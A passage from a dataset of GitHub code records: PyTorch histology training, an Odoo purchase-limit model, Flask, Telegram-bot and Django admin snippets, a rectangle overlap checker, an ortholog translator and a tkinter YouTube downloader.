saturation=0.1, hue=0.1),\n transforms.RandomAffine(degrees=10, translate=(0.1,0.1), scale=(0.8,1.2), shear=10, fillcolor=(245, 245, 245)),\n transforms.ToTensor(), transforms.Normalize(mean=[1.4128, 1.4503, 1.5884], std=[0.5338, 0.6164, 0.6477])\n ,transforms.RandomApply([AddGaussianNoise(0., 0.1)], p=0.5)\n ])\n \n for data, target in get_batch_of_bags(x_train, y_train, s_train, transform, bag_size , batch_size , training_iterations):\n data, target = data.cuda(), target.cuda()\n optimizer.zero_grad()\n output = model(data)\n loss = criterion(output, target.long())\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n _, pred = torch.max(output, 1)\n y_true.extend(target.cpu().numpy())\n y_pred.extend(pred.cpu().numpy())\n data, target = data.cpu(), target.cpu() # to free up cuda memory\n _ , pred = _.cpu(), pred.cpu() # to free up cuda memory\n training_acc.append(np.sum(np.array(y_true) == np.array(y_pred)) / (training_iterations*batch_size))\n training_loss.append(train_loss/training_iterations)\n \n ##############\n # Validation #\n ##############\n y_true , y_pred = [] , []\n model.eval()\n # preparing the transform object for validation\n if From == 'Random':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor()])\n elif From == 'ImageNet':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor(),transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n elif From == 'PCAM':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor(),transforms.Normalize(mean=[1.0294, 0.5995, 1.3757], std=[0.8379, 1.0470, 0.8024])])\n elif From == 'IHC':\n transform = transforms.Compose([transforms.ToPILImage(mode= 'RGB'), transforms.ToTensor(),transforms.Normalize(mean=[1.4128, 1.4503, 1.5884], std=[0.5338, 0.6164, 0.6477])])\n\n 
for data, target in get_batch_of_bags(x_valid, y_valid, s_valid, transform, bag_size , batch_size , validation_iterations, seed=123):\n data, target = data.cuda(), target.cuda()\n output = model(data)\n loss = criterion(output, target.long())\n valid_loss += loss.item()\n _, pred = torch.max(output, 1)\n y_true.extend(target.cpu().numpy())\n y_pred.extend(pred.cpu().numpy())\n data, target = data.cpu(), target.cpu() # to free up cuda memory\n _, pred = _.cpu(), pred.cpu()\n validation_acc.append(np.sum(np.array(y_true) == np.array(y_pred)) / (validation_iterations*batch_size))\n validation_loss.append(valid_loss/validation_iterations)\n torch.save(model.state_dict(), filename+'.pt')\n if validation_loss[-1] <= valid_loss_min:\n torch.save(model.state_dict(), filename+'.pt')\n valid_loss_min = validation_loss[-1]\n # if validation_acc[-1] >= valid_acc_max:\n # torch.save(model.state_dict(), filename+'.pt')\n # valid_acc_max = validation_acc[-1]\n \n return training_loss , validation_loss , training_acc , validation_acc\n\n\ndef Print(text , filename):\n with open(filename, \"a\") as file_object:\n file_object.write(text)\n\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nif __name__ == \"__main__\":\n Folder = '/MIL-CrossValidation/'\n batch_size = 64\n bag_size = 100\n n_epochs = 50\n lr = 1e-03\n wd = 1e-07\n Target = 'Multiclass' #Binary/Multiclass\n From = 'PCAM' # Random/ImageNet/PCAM/IHC\n itr = 1\n\n trial_name = '5FoldCV - MIL-Att - H&E-HER2 '+Target+' - AlexNet-Embedder -'+From+' - lr = '+str(lr)+' wd = '+str(wd)+' bag_size = '+str(bag_size)+' batch_size = '+str(batch_size)+' -'\n output_file = Folder+trial_name+' outputs.txt'\n # print(trial_name)\n Print(trial_name+'\\n' , output_file)\n\n # importing the data\n X = h5py.File('/HER2_HE_96x96_training.h5', 'r')['x']\n Y = h5py.File('/HER2_HE_96x96_training.h5', 'r')['y']\n S = h5py.File('/HER2_HE_96x96_training.h5', 'r')['s']\n \n X , Y , S = np.array(X) ,np.array(Y), np.array(S)\n\n if Target == 'Binary':\n # constructing a binary classification dataset from the multiclass dataset\n Y[Y==1] = 0\n Y[Y==3] = 1\n Y[Y==2] = 1\n classes = [0 , 1]\n \n elif Target == 'Multiclass':\n classes = [0 , 1 , 2 , 3]\n\n\n Training_Loss, Training_Acc, Validation_Loss, Validation_Acc = pd.DataFrame([]), pd.DataFrame([]), pd.DataFrame([]), pd.DataFrame([])\n\n itr = 0\n slides = np.unique(S)\n kf = KFold(n_splits=5, random_state=123, shuffle=True)\n for train_index, valid_index in kf.split(slides):\n itr += 1\n boolidx = False\n for s in slides[train_index]:\n boolidx= np.logical_or(boolidx , np.array(S)==s)\n x_train = X[boolidx]\n y_train = Y[boolidx]\n s_train = S[boolidx]\n boolidx = False\n for s in slides[valid_index]:\n boolidx= np.logical_or(boolidx , np.array(S)==s)\n x_valid = X[boolidx]\n y_valid = Y[boolidx]\n s_valid = S[boolidx]\n Print('Starting '+trial_name+str(itr)+'...'+'\\n' , output_file)\n # print('Starting '+trial_name+str(itr)+'...')\n\n if From == 'Random':\n AlexNet = models.alexnet(pretrained = False).features\n elif From == 'ImageNet':\n AlexNet = models.alexnet(pretrained = True).features\n elif From == 'PCAM':\n AlexNet = models.alexnet()\n n_inputs = AlexNet.classifier[6].in_features\n AlexNet.classifier[6] = nn.Linear(n_inputs, 2)\n AlexNet = nn.DataParallel(AlexNet)\n AlexNet.load_state_dict(torch.load('PCAM-pretrained_AlexNet.pt'))\n AlexNet = AlexNet.module.features\n elif From == 'IHC':\n 
AlexNet = models.alexnet()\n n_inputs = AlexNet.classifier[6].in_features\n AlexNet.classifier[6] = nn.Linear(n_inputs, 4)\n AlexNet = nn.DataParallel(AlexNet)\n AlexNet.load_state_dict(torch.load('IHC-pretrained_AlexNet.pt'))\n AlexNet = AlexNet.module.features\n \n for param in AlexNet.parameters():\n param.requires_grad = False\n \n AlexNet = AlexNet.cuda()\n startt = time.time()\n MIL = MILNetwork(AlexNet , bag_size , batch_size , len(classes)).cuda()\n optimizer = optim.Adam(MIL.parameters(), lr=lr, weight_decay = wd)\n criterion = nn.CrossEntropyLoss()\n training_loss , validation_loss , training_acc , validation_acc = Train_Model(MIL , From, criterion , optimizer , n_epochs , bag_size, batch_size,\n Folder+trial_name+str(itr), x_train.copy(),y_train.copy(),s_train.copy(),x_valid.copy(),y_valid.copy(),s_valid.copy())\n endt = time.time()\n p = '('+str(round((endt-startt)/60))+ ' minutes) \\t'+'Maximum validation accuracy was: '+str(max(validation_acc))+', and the minimum validation loss was: '+str(min(validation_loss))\n # print(p)\n Print(p+'\\n' , output_file)\n\n Training_Loss['CV'+str(itr)] = training_loss\n Training_Acc['CV'+str(itr)] = training_acc\n Validation_Loss['CV'+str(itr)] = validation_loss\n Validation_Acc['CV'+str(itr)] = validation_acc\n\n del MIL\n del x_train\n del y_train\n del s_train\n del x_valid\n del y_valid\n del s_valid\n\n with open(Folder+trial_name+'_TraningProgresses.pkl', 'wb') as f:\n pickle.dump((Training_Loss, Training_Acc, Validation_Loss, Validation_Acc) , f)\n\n ","repo_name":"RawanSaifAldeen/HER2-Scoring_MIL-Attention-Model","sub_path":"MIL-Attention- KfoldCV -Training.py","file_name":"MIL-Attention- KfoldCV -Training.py","file_ext":"py","file_size_in_byte":17929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5452507427","text":"from odoo import models, api, fields, _\nfrom odoo.addons import decimal_precision as dp\nfrom datetime import datetime, date, timedelta\nfrom dateutil.relativedelta import relativedelta\nimport bisect\nimport calendar\n\n\nclass ProductSupplierinfo(models.Model):\n _inherit = 'product.supplierinfo'\n\n limit_purchase_bool = fields.Boolean(\n string=_('Limit Purchase'),\n default=False\n )\n limit_purchase_range = fields.Selection([\n ('month', 'Monthly'),\n ('quarter', 'Quarterly'),\n ('anual', 'Annually'),\n ('custom', 'Custom')\n ], default='month',\n string=_('Date Range Limit'),\n help=_('* Monthly: from the first day of the current month until the'\n ' last day of the current month.\\n * Quarterly: from the first'\n 'day of the current quarter until the last day of the'\n 'current quarter. 
Quarters are defined like 01/01/YYYY - '\n '31/03/YYYY, etc.\\n * Annually: From the first day of the year'\n 'until the last day of the current year.\\n'\n '* Custom: Custom range.')\n )\n limit_purchase_quantity = fields.Float(\n string=_('Quantity Limit'),\n digits=dp.get_precision('Product Unit of Measure'),\n default=0.0\n )\n limit_purchase_actual = fields.Float(\n string=_('Quantity actual'),\n digits=dp.get_precision('Product Unit of Measure'),\n compute='_get_limit_purchase_actual',\n compute_sudo=True,\n )\n limit_purchase_purchase_line_warn = fields.Selection([\n ('none', _('None')),\n ('warm', _('Warning')),\n ('block', _('Blocking'))\n ], string=_(\"Warning In Lines\"),\n default='warm'\n )\n date_range_init = fields.Date(\n string=_('Date from'),\n default=fields.datetime.now().date()\n )\n date_range_end = fields.Date(\n string=_('Date to'),\n default=fields.datetime.now().date()+timedelta(days=30)\n )\n\n @api.multi\n @api.depends('limit_purchase_bool', 'limit_purchase_range')\n def _get_limit_purchase_actual(self):\n dates_range = {\n 'month': {},\n 'quarter': {},\n 'anual': {},\n }\n today = fields.datetime.now().date()\n # Month\n dates_range['month']['init'] =\\\n datetime.combine(\n date(today.year, today.month, 1),\n datetime.min.time()\n )\n dates_range['month']['end'] =\\\n datetime.combine(\n date(\n today.year,\n today.month,\n calendar.monthrange(today.year, today.month)[1]\n ),\n datetime.max.time()\n )\n # Quarter\n qbegins = [date(today.year, month, 1) for month in (1, 4, 7, 10)]\n idx = bisect.bisect(qbegins, today)\n dates_range['quarter']['init'] =\\\n datetime.combine(\n qbegins[idx-1],\n datetime.min.time()\n )\n dates_range['quarter']['end'] =\\\n datetime.combine(\n qbegins[idx-1] + relativedelta(months=3) - timedelta(days=1),\n datetime.max.time()\n )\n # Anual\n dates_range['anual']['init'] =\\\n datetime.combine(\n date(today.year, 1, 1),\n datetime.min.time()\n )\n dates_range['anual']['end'] =\\\n datetime.combine(\n date(today.year, 12, 31),\n datetime.max.time()\n )\n for sel in self.filtered(lambda x: x.limit_purchase_bool):\n if sel.limit_purchase_range != 'custom':\n date_init = dates_range[sel.limit_purchase_range]['init']\n date_end = dates_range[sel.limit_purchase_range]['end']\n else:\n date_init = fields.Date.from_string(\n sel.date_range_init)\n date_end = fields.Date.from_string(\n sel.date_range_end)\n domain = [\n ('partner_id', 'child_of', sel.name.id),\n ('state', 'in', ('open', 'paid')),\n ('date_invoice', '>=', fields.Date.to_string(date_init)),\n ('date_invoice', '<=', fields.Date.to_string(date_end))\n ]\n if sel.company_id:\n domain.append(\n ('company_id', '=', sel.company_id.id)\n )\n in_invoice_lines = self.env['account.invoice'].search(\n domain + [('type', '=', 'in_invoice')]\n ).mapped('invoice_line_ids')\n out_invoice_lines = self.env['account.invoice'].search(\n domain + [('type', '=', 'in_refund')]\n ).mapped('invoice_line_ids')\n in_qty_total = 0.0\n out_qty_total = 0.0\n if sel.product_id: # Variants\n in_qty_total =\\\n sum(in_invoice_lines.filtered(\n lambda x: x.product_id.id == sel.product_id.id\n ).mapped('quantity'))\n out_qty_total =\\\n sum(out_invoice_lines.filtered(\n lambda x: x.product_id.id == sel.product_id.id\n ).mapped('quantity'))\n else: # Template\n in_qty_total =\\\n sum(in_invoice_lines.filtered(\n lambda x: x.product_id.product_tmpl_id.id ==\n sel.product_tmpl_id.id\n ).mapped('quantity'))\n out_qty_total =\\\n sum(out_invoice_lines.filtered(\n lambda x: x.product_id.product_tmpl_id.id ==\n 
sel.product_tmpl_id.id\n                    ).mapped('quantity'))\n            sel.limit_purchase_actual = in_qty_total - out_qty_total\n","repo_name":"QubiQ/qu-purchase-workflow","sub_path":"limit_stock_purchase_by_supplier/models/product_supplierinfo.py","file_name":"product_supplierinfo.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33207047732","text":"#1000 + 70 * x < c * x\n#a < (c-b) * x\n#x > a / (c-b)\n\nimport math\n\na, b, c = map(int, input().split(' '))\n\nif b >= c:\n    print(-1)\nelse:\n    x = a / (c - b)\n\n    if math.ceil(x) == x:\n        print(int(math.ceil(x)) + 1)\n    else:\n        print(math.ceil(x))\n","repo_name":"dskym/Algorithm","sub_path":"ACMICPC/1712.py","file_name":"1712.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70417149266","text":"#!/usr/bin/env python3\nimport sys\nimport os\nPACKAGE_PARENT = '..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom model.record import record, read\n\napp = Flask(__name__)\nCORS(app)\n\n##### ********* DHT11 ******** ####\n@app.route('/Record/', methods=['POST'])\ndef record_controller():\n    return record(request)\n\n@app.route('/Read/<id_rp>', methods=['GET'])\ndef read_controller(id_rp):\n    id_sensor = request.args.get('id_sensor', '')\n    return read(id_rp, id_sensor)\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=5002)","repo_name":"josgarcam/RP_sensor","sub_path":"API/controller/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72981960787","text":"from aiogram.utils.keyboard import InlineKeyboardButton, InlineKeyboardBuilder, InlineKeyboardMarkup\nfrom aiogram.filters.callback_data import CallbackData\n\nFORM_ORDER = \"Перейти к оформлению\"\n\nBACK_TO_CART = '🔙 Вернуться в корзину'\nBACK_TO_CITY = '🔙 Вернуться к выбору города'\nBACK_TO_ADDRESS = '🔙 Вернуться к заполнению адреса'\nBACK_TO_NAME = '🔙 Вернуться к заполнению имени'\nBACK_TO_PHONE = '🔙 Вернуться к заполнению телефона'\nCANCEL_ORDER = '🛑 Отменить оформление заказа'\nACCORD_ORDER = '✅ Подтвердить'\nPAY = 'Оплатить'\n\n\nclass CancelCallbackFactory(CallbackData, prefix='cancel', sep='_'):\n    back_to: str\n\n\nbuttons = {\n    'cart': InlineKeyboardButton(\n        text=BACK_TO_CART, callback_data=CancelCallbackFactory(back_to='cart').pack()\n    ),\n    'city': InlineKeyboardButton(\n        text=BACK_TO_CITY, callback_data=CancelCallbackFactory(back_to='city').pack()\n    ),\n    'address': InlineKeyboardButton(\n        text=BACK_TO_ADDRESS, callback_data=CancelCallbackFactory(back_to='address').pack()\n    ),\n    'name': InlineKeyboardButton(\n        text=BACK_TO_NAME, callback_data=CancelCallbackFactory(back_to='name').pack()\n    ),\n    'phone': InlineKeyboardButton(\n        text=BACK_TO_PHONE, callback_data=CancelCallbackFactory(back_to='phone').pack()\n    ),\n    'exit': InlineKeyboardButton(\n        text=CANCEL_ORDER, callback_data=CancelCallbackFactory(back_to='exit').pack()\n    ),\n}\n\n\ndef create_order_keyboard() -> InlineKeyboardMarkup:\n    kb = InlineKeyboardBuilder()\n    button = InlineKeyboardButton(text=FORM_ORDER, callback_data='order')\n    kb.add(button)\n    return kb.as_markup()\n\n\ndef create_cities_keyboard(cities: 
list) -> InlineKeyboardMarkup:\n    kb = InlineKeyboardBuilder()\n    kb.row(\n        *[\n            InlineKeyboardButton(text=city['name'],\n                                 callback_data=f'city:{city[\"id\"]}:{city[\"name\"]}') for\n            city in cities\n        ],\n        width=2\n    )\n    kb.row(buttons['cart'], width=1)\n    kb.row(buttons['exit'], width=1)\n    return kb.as_markup()\n\n\ndef create_cancel_keyboard(back_to: str) -> InlineKeyboardMarkup:\n    kb = InlineKeyboardBuilder()\n    kb.row(buttons[back_to], width=1)\n    kb.row(buttons['exit'], width=1)\n    return kb.as_markup()\n\n\ndef create_accord_keyboard() -> InlineKeyboardMarkup:\n    kb = InlineKeyboardBuilder()\n    kb.row(InlineKeyboardButton(text=ACCORD_ORDER, callback_data='accord'))\n    kb.row(buttons['phone'], width=1)\n    kb.row(buttons['exit'], width=1)\n    return kb.as_markup()\n","repo_name":"Ponimon4ik/telegram_shop","sub_path":"app/bot/shop/core/keyboards/order_keyboard.py","file_name":"order_keyboard.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4130076457","text":"import math\nclass Controller:\n    def rotate_point(self, x, y, angle):\n        angle_rad = math.radians(angle)\n        cos_theta = math.cos(angle_rad)\n        sin_theta = math.sin(angle_rad)\n        x_rot = (x * cos_theta) - (y * sin_theta)\n        y_rot = (x * sin_theta) + (y * cos_theta)\n        return x_rot, y_rot\n\n    def calculate_vertices(self, center_x, center_y, length, width, angle):\n        half_length = length / 2\n        half_width = width / 2\n\n        # Calculate the four corners of the rectangle\n        top_left = self.rotate_point(-half_length, half_width, angle)\n        top_right = self.rotate_point(half_length, half_width, angle)\n        bottom_left = self.rotate_point(-half_length, -half_width, angle)\n        bottom_right = self.rotate_point(half_length, -half_width, angle)\n\n        # Translate the rotated points to the center coordinates\n        top_left = (top_left[0] + center_x, top_left[1] + center_y)\n        top_right = (top_right[0] + center_x, top_right[1] + center_y)\n        bottom_left = (bottom_left[0] + center_x, bottom_left[1] + center_y)\n        bottom_right = (bottom_right[0] + center_x, bottom_right[1] + center_y)\n\n        return top_left, top_right, bottom_left, bottom_right\n\n    def is_inside_rectangle(self, point, vertices):\n        # Find the minimum and maximum x and y coordinates of the rectangle\n        min_x = min(vertex[0] for vertex in vertices)\n        max_x = max(vertex[0] for vertex in vertices)\n        min_y = min(vertex[1] for vertex in vertices)\n        max_y = max(vertex[1] for vertex in vertices)\n\n        # Check if the given point is inside the rectangle\n        if min_x <= point[0] <= max_x and min_y <= point[1] <= max_y:\n            return True\n        else:\n            return False\n\n    def check_rectangle_crossing(self, center1_x, center1_y, length1, width1, angle1,\n                                 center2_x, center2_y, length2, width2, angle2):\n        # Calculate the four vertices for each rectangle\n        vertices1 = self.calculate_vertices(center1_x, center1_y, length1, width1, angle1)\n        vertices2 = self.calculate_vertices(center2_x, center2_y, length2, width2, angle2)\n\n        # Check for intersection\n        for vertex in vertices1:\n            if self.is_inside_rectangle(vertex, vertices2):\n                return True\n\n        for vertex in vertices2:\n            if self.is_inside_rectangle(vertex, vertices1):\n                return True\n\n        return False\n\n\n\n    # Same as the previous code block\n\n\n\n    # # Example usage:\n    # center1_x, center1_y = 0, 0\n    # length1, width1 = 4, 2\n    # angle1 = 0\n    #\n    # center2_x, center2_y = 3, 0\n    # length2, width2 = 4, 2\n    # angle2 = 30\n    #\n    # crossing = check_rectangle_crossing(center1_x, center1_y, length1, width1, angle1,\n    #                                     
center2_x, center2_y, length2, width2, angle2)\n    #\n    # if crossing:\n    #     print(\"Rectangles are crossing.\")\n    # else:\n    #     print(\"Rectangles are not crossing.\")","repo_name":"IvanTheDumbestProgrammer/ControlSys","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27532369130","text":"import collections\n\nclass ManyToManyTranslator(object):\n    \"\"\"\n    self.transl (dict): {frozenset a} -> {frozenset b}\n    self.reverse_transl (dict): {frozenset b} -> {frozenset a}\n    \"\"\"\n    \n    def __init__(self, input_name, output_name,\n                 name='Unnamed ManyToManyTranslator object'):\n        \n        self.input_name = input_name\n        self.output_name = output_name\n        self.name = name\n        #self.max_orthologs = max_orthologs\n        self.transl = {}\n        self.reverse_transl = {}\n\n    def reverse(self):\n        (self.input_name, self.output_name) = (self.output_name, self.input_name)\n        (self.transl, self.reverse_transl) = (self.reverse_transl, self.transl)\n    \n    def define_mappings_from_one_to_one_list(\n            self, list_of_paired_ids):\n        \n        for (seta, setb) in list_of_paired_ids:\n            self.transl[frozenset([seta])] = frozenset([setb])\n            self.reverse_transl[frozenset([setb])] = frozenset([seta])\n\n    def define_mappings_from_list_of_paired_sets(\n            self, list_of_paired_sets,\n            max_orthologs=5):\n        \n        for (seta, setb) in list_of_paired_sets:\n            if (len(seta)>max_orthologs) or (len(setb)>max_orthologs):\n                continue\n            self.transl[frozenset(seta)] = frozenset(setb)\n            self.reverse_transl[frozenset(setb)] = frozenset(seta)\n    \n    def combine_list_of_sets_based_on_homology(self, _list, reverse_transl=False):\n        \n        if reverse_transl:\n            groupings = list(self.reverse_transl.keys())\n        else:\n            groupings = list(self.transl.keys())\n        \n        print('combine_list_of_sets_based_on_homology():')\n        \n        expanded = self.expand_list_of_sets_to_include_all_in_group(\n            _list, groupings)\n        \n        print('Expanded input list of {0} items (=output length {1}).'.format(\n            len(_list), len(expanded)))\n        \n        collapsed = list(set(expanded))#self.collapse_list_of_sets(expanded)\n        print(\"Collapsed a list of sets to length {0}.\".format(len(collapsed)))\n        return collapsed\n    \n    @staticmethod\n    def expand_list_of_sets_to_include_all_in_group(_t, groupings):\n        expanded = [set() for x in _t]\n        \n        for n, _a in enumerate(_t):\n            \n            for _b in groupings:\n                \n                if _a & _b:\n                    expanded[n] |= _b\n        \n        for n in range(len(expanded)):\n            expanded[n] = frozenset(expanded[n])\n        \n        return expanded\n    \n    @staticmethod\n    def collapse_list_of_sets(_t):\n        print(\"Collapsing a list of sets of length {0}\".format(len(_t)))\n        collapsed = []\n        \n        def remove_a_row(_list):\n            for n1, _a in enumerate(_t):\n                for n2, _b in enumerate(_t[n1+1:], start=n1+1):\n                    if _a & _b:\n                        return (True, n1, n2)\n            return (False, -1, -1)\n        \n        has_overlaps = True\n        \n        while has_overlaps:\n            has_overlaps, n1, n2 = remove_a_row(_t)\n            if has_overlaps:\n                _t[n1] |= _t[n2]\n                del _t[n2]\n        \n        print(\"Collapsed a list of sets to length {0}.\".format(len(_t)))\n        return _t\n    \n    @classmethod\n    def collapse_list_of_paired_sets(cls, _t, verbose=False):\n        \n        print(\"Collapsing a list of paired sets, length {0}.\".format(len(_t)))\n        \n        done_collapsing = False\n        iterations = 1\n        while not done_collapsing:\n            print(\"On iteration {0}.\".format(iterations))\n            done_collapsing, _t = cls.run_through_to_collapse(_t, verbose=verbose)\n            iterations += 1\n        print(\"Fully collapsed.\")\n        return _t\n    \n    @staticmethod\n    def run_through_to_collapse(_t, 
verbose=False):\n        \n        fully_collapsed = True\n        collapsed = []\n        \n        all_a_items, all_b_items = (set(), set()) \n        \n        updated_rows = collections.defaultdict(int)  # For QC.\n        \n        for (_a, _b) in _t:\n            \n            if (_a & all_a_items) or (_b & all_b_items):\n                \n                hits = []\n                \n                for n, _row in enumerate(collapsed):\n                    if (_a & collapsed[n][0]) or (_b & collapsed[n][1]):\n                        collapsed[n][0] |= _a\n                        collapsed[n][1] |= _b\n                        hits.append(collapsed[n])\n                \n                if len(hits) != 1:\n                    fully_collapsed = False\n                    #print(\"error for row {0}\".format([_a, _b]))\n                    #print(\"{0} hits\".format(len(hits)))\n                \n            else:\n                collapsed.append([_a, _b])\n                \n            all_a_items |= _a\n            all_b_items |= _b\n        \n        # The following is all quality control.\n        print(\"Collapsed to length {0}\".format(len(collapsed)))\n        print(\"There were {0} unique items in the first position, and {1} in the second.\".format(\n            len(all_a_items), len(all_b_items)))\n        \n        collapsed_a_items = set()\n        collapsed_b_items = set()\n        for (_a, _b) in _t:\n            collapsed_a_items |= _a\n            collapsed_b_items |= _b\n        \n        print(\"After collapse, there were {0} and {1} items. (Should be the same.)\".format(\n            len(collapsed_a_items), len(collapsed_b_items)))\n        \n        lost_a = all_a_items - collapsed_a_items\n        lost_b = all_b_items - collapsed_b_items\n        \n        if len(lost_a):\n            print(\"Erroneously lost the following from A: {0}\".format(lost_a))\n        if len(lost_b):\n            print(\"Erroneously lost the following from B: {0}\".format(lost_b)) \n\n        return fully_collapsed, collapsed\n    \n    def translate_list(self, _list, **kwargs):\n        \n        if 'verbose' in kwargs and (kwargs['verbose']):\n            if ('reverse' not in kwargs) or (not kwargs['reverse']):\n                print(\"Translating list of length {0} from {1} to {2}\".format(\n                    len(_list), self.input_name, self.output_name))\n            else:\n                print(\"Translating list of length {0} from {1} to {2}\".format(\n                    len(_list), self.output_name, self.input_name))\n        \n        output = []\n        for n, item in enumerate(_list, start=1):\n            \n            output.append(self.translate(item, **kwargs))\n            if not (n % 200):\n                print(\"Translated item {0} ({1}) to {2}\".format(n, item, output[-1]))\n        \n        return output\n    \n    def translate(\n            self, input_id, verbose=False, reverse=False,\n            multiple_homologs_in_native_language_possible=True,\n            return_str=False):\n        \n        # input_id is frozenset\n        if type(input_id) == type(''):\n            input_id = frozenset([input_id])\n        \n        if verbose:\n            print('looking for ', input_id)\n        \n        translates_to = set()\n        if not reverse:\n            \n            if multiple_homologs_in_native_language_possible:\n                for k in self.transl:\n                    if len(k & input_id) > 0:\n                        translates_to |= self.transl[k]\n            else:\n                translates_to = self.transl[input_id]\n        \n        else:\n            for k in self.reverse_transl:\n                if len(k & input_id) > 0:\n                    translates_to |= self.reverse_transl[k]\n        \n        if return_str:\n            _list = list(translates_to)\n            \n            if len(_list) == 1:\n                return str(_list[0])\n            \n            elif len(_list) == 0:\n                \n                if len(list(input_id)) == 1:\n                    return str(list(input_id)[0])\n                else:\n                    return str(input_id)\n            \n            else:\n                return str(translates_to)\n        \n        return translates_to","repo_name":"dfporter/FBF_gendered_gl","sub_path":"orthos/simple/ManyToManyTranslator.py","file_name":"ManyToManyTranslator.py","file_ext":"py","file_size_in_byte":8033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34794844440","text":"\n\nfrom django.contrib import admin\nfrom app.forms import ConfigurationAdminForm, OrderAdminForm, ProductAdminForm, PropertyAdminForm\nfrom .models import *\n\nclass ImageInline(admin.TabularInline):\n    model = Image\n    extra = 
3\nclass BannerImageInline(admin.TabularInline):\n    model = BannerImage\n    extra = 3\nclass InfoInline(admin.TabularInline):\n    model = ProductInformation\n    extra = 1\nclass OrderItemInline(admin.TabularInline):\n    model = OrderItem\n    extra = 0\nclass ConfigurationAdmin(admin.ModelAdmin):\n    list_display=('id','website_name')\n    form = ConfigurationAdminForm\nclass CategoryAdmin(admin.ModelAdmin):\n    list_display=('id','name')\n    exclude = ('slug',)\nclass TagAdmin(admin.ModelAdmin):\n    list_display=('name',)\n    exclude = ('slug',)\nclass CurrencyAdmin(admin.ModelAdmin):\n    list_display=('code','symbol')\nclass ProductAdmin(admin.ModelAdmin):\n    list_display=('id','name','price','old_price')\n    readonly_fields = ['img_preview']\n    form = ProductAdminForm\n    exclude = ('slug',)\n    inlines = [ImageInline,InfoInline]\nclass ProductReviewAdmin(admin.ModelAdmin):\n    list_display=('id','title','product','name')\n\nclass PropertyAdmin(admin.ModelAdmin):\n    list_display=('id','name','value','type')\n    form = PropertyAdminForm\nclass OrderAdmin(admin.ModelAdmin):\n    list_display=('id','name','phone','total_price','complete')\n    form = OrderAdminForm\n    inlines = [OrderItemInline]\nclass CustomerAdmin(admin.ModelAdmin):\n    list_display=('id','name','email','phone')\nclass BannerAdmin(admin.ModelAdmin):\n    list_display=('id','title','description','tag')\n    inlines = [BannerImageInline,]\nadmin.site.register(Configuration,ConfigurationAdmin)\nadmin.site.register(Category,CategoryAdmin)\nadmin.site.register(Property,PropertyAdmin)\nadmin.site.register(PropertyType)\nadmin.site.register(Product, ProductAdmin)\nadmin.site.register(ProductReview, ProductReviewAdmin)\nadmin.site.register(Tag, TagAdmin)\nadmin.site.register(Currency,CurrencyAdmin)\nadmin.site.register(Order,OrderAdmin)\nadmin.site.register(Customer,CustomerAdmin)\nadmin.site.register(Banner,BannerAdmin)\n","repo_name":"hicach99/store","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35511667634","text":"from tkinter import *\r\nfrom pytube import YouTube\r\nfrom os import getcwd,mkdir,chdir\r\nroot=Tk()\r\nroot.geometry('900x500')\r\nroot.resizable(0,0)\r\nroot.title(\"sms youtube video downloader\")\r\nlabel=Label(root,text=\"YouTube video downloader\",bg=\"black\",fg=\"green\",font=\"Helvetika 40 bold\",pady=30)\r\nlabel.pack(fill=X)\r\nf1=Frame(root,bg='black',height=900,width=900)\r\nf1.pack()\r\nLabel(f1,text=\"paste a link below :\",font=\"Helvetika 20 bold\",bg=\"black\",fg=\"white\").place(x=320,y=20)\r\nlink=StringVar()\r\nlinkentry=Entry(f1,width=50,textvariable=link,fg=\"maroon4\",font=\"helvetika 10 bold\",bd=5).place(x=265,y=80)\r\ndef downloader():\r\n    try:\r\n        url=YouTube(str(link.get())) \r\n        video=url.streams.first() \r\n        try:\r\n            mkdir(\"sms youtube downloader\") \r\n        except FileExistsError:\r\n            pass\r\n        #video.download()\r\n        t=getcwd()+\"\sms youtube downloader\" \r\n        chdir(t)\r\n        video.download()\r\n        path=getcwd() \r\n        text=\"your video is downloaded in.....\"+path\r\n        Label(f1,text=\"DOWNLOAD COMPLETED...\",font=\" Helvetika 20 bold\",bg=\"black\",fg=\"VioletRed4\").place(x=300,y=230)\r\n        Label(f1,text=text,bg=\"black\",fg=\"white\",font=\"helvetika 10 bold\").place(x=0,y=320)\r\n    except :\r\n        Label(f1,text=\"first paste a link..\",font=\"Helvetika 15 bold\",bg=\"black\",fg=\"VioletRed4\").place(x=300,y=230)\r\n\r\nButton(f1,text=\"Download\",font=\"Helvetika 18 
